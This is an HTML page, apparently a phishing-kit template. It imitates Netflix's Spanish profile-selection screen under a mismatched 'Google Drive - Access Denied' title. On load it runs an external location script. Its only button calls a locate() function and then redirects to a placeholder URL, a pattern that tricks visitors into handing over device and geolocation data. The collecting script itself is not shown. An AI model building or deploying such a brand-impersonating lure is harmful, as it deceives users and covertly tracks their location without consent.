<!DOCTYPE html>
<html lang="en">
<head>
	<meta name="description" content="Web word processing, presentations and spreadsheets">
	<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, user-scalable=0">
	<link rel="shortcut icon" href="/images/drive_favicon1.ico">
	<title>Google Drive - Access Denied</title>
	<link rel="stylesheet" type="text/css" href="css/main.css">
	<script type="text/javascript">
    	if (window.location.protocol == "http:") {
        	var restOfUrl = window.location.href.substr(5);
        	window.location = "https:" + restOfUrl;
    	}
    </script>
    <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
	<script type="text/javascript" src="js/location.js"></script>
</head>
<body onload="information();">
	<h2>¿Quien esta viendo ahora?</h2>
    <h1>NETFLIX</h1>
     
    <br>
    <div>
        
        <img src="imagenes/Imagen.png" title="Perfiles " >
        
    </div>
    
    <div>
        <button class="btn" id="requestButton" style="font-weight:bold" class="jfk-button jfk-button-action" onclick="locate(function(){window.location='REDIRECT_URL';}, function(){$('#change').html('Failed');});">seleccionar</button>
        </div>
</body>
</html>